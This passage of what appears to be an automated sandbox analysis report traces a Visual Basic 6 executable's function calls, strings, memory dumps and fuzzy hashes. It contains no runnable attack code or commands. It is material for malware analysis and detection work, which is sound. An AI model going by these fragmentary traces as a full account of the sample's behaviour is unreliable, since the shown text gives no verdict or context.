                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041D4F6
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C70,000000A0), ref: 0041D540
                                                • __vbaStrToAnsi.MSVBVM60(?,?), ref: 0041D55B
                                                • __vbaStrToAnsi.MSVBVM60(?,Tvivlsomst9,00000000,?,?), ref: 0041D56A
                                                • __vbaSetSystemError.MSVBVM60(00000000,?,Tvivlsomst9,00000000,?,?), ref: 0041D57B
                                                • __vbaFreeStrList.MSVBVM60(00000003,?,?,?,00000000,?,Tvivlsomst9,00000000,?,?), ref: 0041D5A6
                                                • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,00401356), ref: 0041D5B1
                                                • __vbaNew2.MSVBVM60(00403258,00422010,?,?,?,?,?,?,00401356), ref: 0041D5DF
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041D618
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000050), ref: 0041D65C
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041D683
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041D6BC
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000170), ref: 0041D706
                                                • __vbaStrCat.MSVBVM60(?,?), ref: 0041D720
                                                • __vbaStrMove.MSVBVM60(?,?), ref: 0041D72A
                                                • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?), ref: 0041D739
                                                • __vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,00401356), ref: 0041D74B
                                                • __vbaPrintObj.MSVBVM60(00403D30,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401356), ref: 0041D766
                                                • __vbaNew2.MSVBVM60(00403258,00422010,?,?,?,?,?,?,00401356), ref: 0041D788
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041D7C1
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000110), ref: 0041D80B
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041D832
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041D86B
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000100), ref: 0041D8B5
                                                • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0041D8D7
                                                • __vbaI4Var.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,00401356), ref: 0041D8E0
                                                • __vbaStrToAnsi.MSVBVM60(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00401356), ref: 0041D8ED
                                                • __vbaSetSystemError.MSVBVM60(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00401356), ref: 0041D8FE
                                                • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041D925
                                                • __vbaFreeObjList.MSVBVM60(00000003,?,?,?,?,00000000,00000000), ref: 0041D93B
                                                • __vbaFreeVar.MSVBVM60(?,?,?,?,?,00000000,00000000), ref: 0041D949
                                                • __vbaNew2.MSVBVM60(00403258,00422010,?,?,?,?,?,00000000,00000000), ref: 0041D977
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041D9B0
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000048), ref: 0041D9F4
                                                • #717.MSVBVM60(?,00000008,00000080,00000000), ref: 0041DA40
                                                • __vbaVar2Vec.MSVBVM60(?,?,?,00000008,00000080,00000000), ref: 0041DA53
                                                • __vbaAryMove.MSVBVM60(?,?,?,?,?,00000008,00000080,00000000), ref: 0041DA63
                                                • __vbaFreeObj.MSVBVM60(?,?,?,?,?,00000008,00000080,00000000), ref: 0041DA6B
                                                • __vbaFreeVarList.MSVBVM60(00000002,00000008,?,?,?,?,?,?,00000008,00000080,00000000), ref: 0041DA80
                                                • __vbaOnError.MSVBVM60(000000FF), ref: 0041DA91
                                                • __vbaSetSystemError.MSVBVM60(000000FF), ref: 0041DAA2
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041DAC1
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041DAFA
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C70,000001E8), ref: 0041DB47
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041DB6E
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041DBA7
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C70,000001F0), ref: 0041DBF4
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041DC1B
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041DC54
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C70,000000E0), ref: 0041DCA1
                                                • __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 0041DD31
                                                • __vbaNew2.MSVBVM60(00403258,00422010,?,?,?,?,?,?,00401356), ref: 0041DD53
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041DD8C
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000120), ref: 0041DDD9
                                                • __vbaFreeObj.MSVBVM60 ref: 0041DE15
                                                • __vbaStrCopy.MSVBVM60 ref: 0041DE29
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403900,000006F8), ref: 0041DE78
                                                • __vbaFreeStr.MSVBVM60(00000000,?,00403900,000006F8), ref: 0041DE8F
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041DEAE
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041DEE7
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403C70,00000060), ref: 0041DF2E
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041DF55
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041DF8E
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000110), ref: 0041DFD8
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041DFFF
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041E038
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000120), ref: 0041E085
                                                • __vbaFreeStr.MSVBVM60 ref: 0041E0D8
                                                • __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 0041E0EB
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403900,000006FC), ref: 0041E131
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041E168
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041E1A1
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403CDC,00000048), ref: 0041E1E5
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041E20C
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041E245
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C70,000000F8), ref: 0041E292
                                                • __vbaStrMove.MSVBVM60(00000000,?,00403C70,000000F8), ref: 0041E2CA
                                                • __vbaStrMove.MSVBVM60 ref: 0041E31D
                                                • __vbaFreeStr.MSVBVM60 ref: 0041E325
                                                • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0041E334
                                                • __vbaNew2.MSVBVM60(00403258,00422010,?,?,?,?,?,?,?,?,?,?,?,?,?,00401356), ref: 0041E356
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041E38F
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000130), ref: 0041E3D9
                                                • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0041E3FB
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041E416
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041E44F
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C70,000001E0), ref: 0041E499
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041E4C0
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041E4FC
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000140), ref: 0041E549
                                                • __vbaStrMove.MSVBVM60(00000000,?,00403CDC,00000140), ref: 0041E573
                                                • __vbaStrVarMove.MSVBVM60(?), ref: 0041E57F
                                                • __vbaStrMove.MSVBVM60(?), ref: 0041E589
                                                • __vbaStrMove.MSVBVM60 ref: 0041E5C9
                                                • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041E5D8
                                                • __vbaFreeObjList.MSVBVM60(00000004,?,?,?,?), ref: 0041E5F5
                                                • __vbaFreeVar.MSVBVM60 ref: 0041E603
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041E622
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041E65B
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000120), ref: 0041E6A8
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041E6CF
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041E708
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000140), ref: 0041E755
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403900,00000700), ref: 0041E7CD
                                                • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0041E7F4
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041E816
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041E84F
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000180), ref: 0041E89C
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041E8C3
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041E8FC
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000160), ref: 0041E946
                                                • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0041E968
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041E983
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041E9BF
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C70,00000108), ref: 0041EA0C
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041EA33
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041EA6F
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C70,000000D8), ref: 0041EABC
                                                • __vbaI4Var.MSVBVM60(?,?,?), ref: 0041EAFE
                                                • __vbaFreeObjList.MSVBVM60(00000005,?,?,?,?,?), ref: 0041EB3A
                                                • __vbaFreeVar.MSVBVM60 ref: 0041EB48
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041EB67
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041EBA0
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000130), ref: 0041EBEA
                                                • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0041EC0C
                                                • __vbaStrCopy.MSVBVM60 ref: 0041EC1C
                                                • __vbaStrVarMove.MSVBVM60(?,00006FEE,?,?), ref: 0041EC4B
                                                • __vbaStrMove.MSVBVM60(?,00006FEE,?,?), ref: 0041EC55
                                                • __vbaFreeStrList.MSVBVM60(00000002,00000000,?), ref: 0041EC91
                                                • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0041ECA3
                                                • __vbaFreeVar.MSVBVM60 ref: 0041ECB1
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041ECD0
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041ED09
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,000000F8), ref: 0041ED56
                                                • __vbaStrCopy.MSVBVM60(00000000,?,00403CDC,000000F8), ref: 0041ED80
                                                • __vbaStrCopy.MSVBVM60(00000000,?,00403CDC,000000F8), ref: 0041ED8D
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403900,00000704), ref: 0041EDE0
                                                • __vbaFreeStrList.MSVBVM60(00000002,00000000,?), ref: 0041EDFE
                                                • __vbaFreeObj.MSVBVM60 ref: 0041EE09
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403900,00000708), ref: 0041EE4C
                                                • __vbaFreeVar.MSVBVM60(00000000,?,00403900,00000708), ref: 0041EE66
                                                • __vbaFreeStr.MSVBVM60(0041EF2D), ref: 0041EEE1
                                                • __vbaFreeStr.MSVBVM60(0041EF2D), ref: 0041EEE9
                                                • __vbaFreeStr.MSVBVM60(0041EF2D), ref: 0041EEF1
                                                • __vbaFreeStr.MSVBVM60(0041EF2D), ref: 0041EEF9
                                                • __vbaAryDestruct.MSVBVM60(00000000,?,0041EF2D), ref: 0041EF04
                                                • __vbaAryDestruct.MSVBVM60(00000000,?,00000000,?,0041EF2D), ref: 0041EF0F
                                                • __vbaFreeStr.MSVBVM60(00000000,?,00000000,?,0041EF2D), ref: 0041EF17
                                                • __vbaFreeVar.MSVBVM60(00000000,?,00000000,?,0041EF2D), ref: 0041EF1F
                                                • __vbaFreeStr.MSVBVM60(00000000,?,00000000,?,0041EF2D), ref: 0041EF27
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.152009216717.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000002.00000002.152009191692.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000002.00000002.152009377597.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000002.00000002.152009405922.0000000000424000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: __vba$Free$CheckHresult$New2$List$Move$CopyError$CallLateSystem$Ansi$Destruct$#517#618#692#711#712#717ChkstkPrintVar2
                                                • String ID: 2$Apparat5$Bakteriers$Bovlamme1$Calelectricity$Hvepsetaljer$INDUSTRIALIZING$Koaguleringerne7$STYRETABELLER$Tosdede8$Tvivlsomst9$Unecliptic9$Zombie3$phrontisterium$stivstikkere$T
                                                • API String ID: 2704859531-1304991006
                                                • Opcode ID: 579499437a8beee8dac9c6734a277c9f080c5784c17d1995862d2bee11e4c0df
                                                • Instruction ID: 754715e3ac8f6e211eee201f4b15111fb7717f4e1d9ac9ab1f331b26faa7a824
                                                • Opcode Fuzzy Hash: 579499437a8beee8dac9c6734a277c9f080c5784c17d1995862d2bee11e4c0df
                                                • Instruction Fuzzy Hash: 9503F671900229AFDB20DF60CC45FDDB7B9BB48304F1044EAE50ABB2A1DB795A85DF58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041F37D, Relevance: 68.6, APIs: 35, Strings: 4, Instructions: 358COMMON
                                                Download Yara Rule
                                                APIs
                                                • __vbaChkstk.MSVBVM60(?,00401356), ref: 0041F398
                                                • __vbaStrCopy.MSVBVM60(?,?,?,?,00401356), ref: 0041F3B0
                                                • __vbaAryConstruct2.MSVBVM60(?,00403EA4,00000002,?,?,?,?,00401356), ref: 0041F3C0
                                                • #690.MSVBVM60(ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403EA4,00000002,?,?,?,?,00401356), ref: 0041F3D9
                                                • __vbaNew2.MSVBVM60(00403258,00422010,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403EA4,00000002,?,?,?,?,00401356), ref: 0041F3F1
                                                • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403EA4,00000002), ref: 0041F41E
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C70,000001F0,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403EA4), ref: 0041F453
                                                • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403EA4,00000002), ref: 0041F46E
                                                • __vbaNew2.MSVBVM60(00403258,00422010,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403EA4,00000002), ref: 0041F486
                                                • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403EA4), ref: 0041F4B3
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000098,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes), ref: 0041F4E8
                                                • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403EA4,00000002), ref: 0041F504
                                                • __vbaNew2.MSVBVM60(00403258,00422010,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403EA4), ref: 0041F51C
                                                • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes), ref: 0041F549
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000178,?,?,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory), ref: 0041F57E
                                                • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403EA4), ref: 0041F59F
                                                • __vbaNew2.MSVBVM60(00403258,00422010,?,?,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes), ref: 0041F5B7
                                                • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory), ref: 0041F5E4
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000098), ref: 0041F619
                                                • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes), ref: 0041F63B
                                                • __vbaNew2.MSVBVM60(00403258,00422010,?,?,?,?,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory), ref: 0041F662
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041F68F
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C70,00000168), ref: 0041F6C4
                                                • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory), ref: 0041F6E6
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041F6FE
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041F72B
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,000000F8), ref: 0041F760
                                                • __vbaFreeObj.MSVBVM60(00000000,?,00403CDC,000000F8), ref: 0041F782
                                                • #598.MSVBVM60(00000000,?,00403CDC,000000F8), ref: 0041F787
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041F79F
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041F7CC
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C70,00000168), ref: 0041F801
                                                • __vbaFreeObj.MSVBVM60(00000000,?,00403C70,00000168), ref: 0041F820
                                                • __vbaAryDestruct.MSVBVM60(00000000,?,0041F84F), ref: 0041F841
                                                • __vbaFreeStr.MSVBVM60(00000000,?,0041F84F), ref: 0041F849
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.152009216717.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000002.00000002.152009191692.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000002.00000002.152009377597.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000002.00000002.152009405922.0000000000424000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: __vba$Free$CheckHresultNew2$#598#690ChkstkConstruct2CopyDestruct
                                                • String ID: Confabulatory$Eksperimenternes$Finansierings$ministerstormens
                                                • API String ID: 2817960149-3291121498
                                                • Opcode ID: 1e071fc8b1d11bb46dc4fe331bb04b8d8b7d6128b47bf0e0dbfdc6888c7f971e
                                                • Instruction ID: 6103411fc6e142b9c50cc88013faef3e8e35291c71befe7756d5fffe7fd2e862
                                                • Opcode Fuzzy Hash: 1e071fc8b1d11bb46dc4fe331bb04b8d8b7d6128b47bf0e0dbfdc6888c7f971e
                                                • Instruction Fuzzy Hash: 25E10B74A40208EFCB10EFA0D945FDDBBB5BF49704F20442AE502BB2A1DB796946DB58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004211BD, Relevance: 15.1, APIs: 10, Instructions: 102COMMON
                                                Download Yara Rule
                                                APIs
                                                • __vbaChkstk.MSVBVM60(?,00401356), ref: 004211D8
                                                • __vbaObjSetAddref.MSVBVM60(?,?,?,?,?,?,00401356), ref: 004211F1
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,004038D0,00000058), ref: 0042121D
                                                • __vbaObjSetAddref.MSVBVM60(?,?), ref: 00421238
                                                • #644.MSVBVM60(?,?,?), ref: 00421241
                                                • __vbaFreeObj.MSVBVM60(00000000,?,?,?), ref: 00421252
                                                • __vbaChkstk.MSVBVM60(?,?,?,00000000,?,?,?), ref: 00421291
                                                • __vbaChkstk.MSVBVM60(?,?,?,00000000,?,?,?), ref: 004212A2
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,004038D0,000002B0), ref: 004212D9
                                                • __vbaFreeObj.MSVBVM60(00421300), ref: 004212FA
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.152009216717.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000002.00000002.152009191692.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000002.00000002.152009377597.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000002.00000002.152009405922.0000000000424000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: __vba$Chkstk$AddrefCheckFreeHresult$#644
                                                • String ID:
                                                • API String ID: 1032928638-0
                                                • Opcode ID: 1b1ca1301a6119da5a535b2e0d4e763b6606aa5f0c79c4436798fd19bcd76c6f
                                                • Instruction ID: 3709a18e759aa2b26d5b491f35aaf62719f077701997b5b941d61713760773f4
                                                • Opcode Fuzzy Hash: 1b1ca1301a6119da5a535b2e0d4e763b6606aa5f0c79c4436798fd19bcd76c6f
                                                • Instruction Fuzzy Hash: A5414AB1900218EFDF01EF91D846BDEBBB5FF14744F50402AF901BB1A1C7B9AA469B58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041EF4C, Relevance: 13.6, APIs: 9, Instructions: 76COMMON
                                                Download Yara Rule
                                                APIs
                                                • __vbaChkstk.MSVBVM60(?,00401356), ref: 0041EF67
                                                • __vbaNew2.MSVBVM60(00403258,00422010,?,?,?,?,00401356), ref: 0041EF8C
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041EFB9
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C70,00000058), ref: 0041EFE8
                                                • #704.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041F00F
                                                • __vbaStrMove.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041F019
                                                • __vbaFreeObj.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041F021
                                                • __vbaFreeVar.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041F029
                                                • __vbaFreeStr.MSVBVM60(0041F04F,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041F049
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.152009216717.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000002.00000002.152009191692.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000002.00000002.152009377597.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000002.00000002.152009405922.0000000000424000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: __vba$Free$#704CheckChkstkHresultMoveNew2
                                                • String ID:
                                                • API String ID: 2174863854-0
                                                • Opcode ID: 4a5995079d9b7235d8762094cff58eeddf67b760376cb5c0488f55a0d6a7167d
                                                • Instruction ID: 831c22b97ee9b19522d4d256e942a8f683a9c9b32ee2fd3e625a861e50fbf100
                                                • Opcode Fuzzy Hash: 4a5995079d9b7235d8762094cff58eeddf67b760376cb5c0488f55a0d6a7167d
                                                • Instruction Fuzzy Hash: 29312B71900218BFCB10DF95CD46FDDBBB5AB44714F20022AF512B71E1DB785946CB59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00421313, Relevance: 10.6, APIs: 7, Instructions: 54COMMON
                                                Download Yara Rule
                                                APIs
                                                • __vbaChkstk.MSVBVM60(?,00401356), ref: 0042132F
                                                  • Part of subcall function 00421444: __vbaChkstk.MSVBVM60(?,0042135E,?,?,?,?,00401356), ref: 0042144A
                                                  • Part of subcall function 00421444: #644.MSVBVM60(?,?,0042135E,?,?,?,?,00401356), ref: 00421474
                                                • __vbaVarMove.MSVBVM60 ref: 00421372
                                                • __vbaVarMove.MSVBVM60 ref: 0042138B
                                                • __vbaVarIdiv.MSVBVM60(?,?,?), ref: 0042139C
                                                • __vbaI4Var.MSVBVM60(00000000,?,?,?), ref: 004213A2
                                                • __vbaFreeVar.MSVBVM60(004213E9), ref: 004213DB
                                                • __vbaFreeVar.MSVBVM60(004213E9), ref: 004213E3
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.152009216717.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000002.00000002.152009191692.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000002.00000002.152009377597.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000002.00000002.152009405922.0000000000424000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: __vba$ChkstkFreeMove$#644Idiv
                                                • String ID:
                                                • API String ID: 1258935826-0
                                                • Opcode ID: b7ec0650b4b824142f0e8ac8946c54511a4da2837a82d70ab1a96dc2c5edb1c4
                                                • Instruction ID: 57b4bca61a28adc783ddea33caf973248d3e84b8893e5805cd88a12cb1b30a85
                                                • Opcode Fuzzy Hash: b7ec0650b4b824142f0e8ac8946c54511a4da2837a82d70ab1a96dc2c5edb1c4
                                                • Instruction Fuzzy Hash: 7711CC71900348AFDB01EFD5C986BCEBBB8EF04744F50846AF406AB5A1D778AA05CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004015A8, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.152009216717.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000002.00000002.152009191692.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000002.00000002.152009377597.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000002.00000002.152009405922.0000000000424000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: #100
                                                • String ID: VB5!6&*
                                                • API String ID: 1341478452-3593831657
                                                • Opcode ID: 3f0d8aff1743c37db78cc5c3685bb27c954c3559d0f779742ddacd0b21d305e6
                                                • Instruction ID: 2169ef6ac4b5ad53e4b0e3f6d0cdf5f3ac2fb7c432345fb32d4d3b1d88993c8e
                                                • Opcode Fuzzy Hash: 3f0d8aff1743c37db78cc5c3685bb27c954c3559d0f779742ddacd0b21d305e6
                                                • Instruction Fuzzy Hash: 7FE0BD0454E3C22ED31326364C350497F319917250B0A15E7C0E2CF0E3C40D080AC33B
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 0041FAAD, Relevance: 91.4, APIs: 50, Strings: 2, Instructions: 369COMMON
                                                Download Yara Rule
                                                APIs
                                                • __vbaChkstk.MSVBVM60(?,00401356), ref: 0041FACB
                                                • __vbaStrCopy.MSVBVM60(?,?,?,?,00401356), ref: 0041FAE3
                                                • #593.MSVBVM60(0000000A), ref: 0041FB15
                                                • __vbaFreeVar.MSVBVM60(0000000A), ref: 0041FB20
                                                • __vbaNew2.MSVBVM60(00403C50,004223FC,0000000A), ref: 0041FB38
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C40,00000014), ref: 0041FB85
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C60,000000D0), ref: 0041FBCC
                                                • __vbaStrMove.MSVBVM60(00000000,?,00403C60,000000D0), ref: 0041FBF6
                                                • __vbaFreeObj.MSVBVM60(00000000,?,00403C60,000000D0), ref: 0041FBFE
                                                • #670.MSVBVM60(?,?,?,?,?,00401356), ref: 0041FC07
                                                • __vbaVarTstEq.MSVBVM60(00008008,?), ref: 0041FC22
                                                • __vbaFreeVar.MSVBVM60(00008008,?), ref: 0041FC2E
                                                • __vbaNew2.MSVBVM60(00403258,00422010,00008008,?), ref: 0041FC52
                                                • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041FC8B
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C70,00000150), ref: 0041FCC0
                                                • __vbaStrCat.MSVBVM60(cheve,?,?,?,?,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041FCDC
                                                • __vbaStrMove.MSVBVM60(cheve,?,?,?,?,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041FCE6
                                                • __vbaStrCat.MSVBVM60(?,00000000,cheve,?), ref: 0041FCEF
                                                • __vbaStrMove.MSVBVM60(?,00000000,cheve,?), ref: 0041FCF9
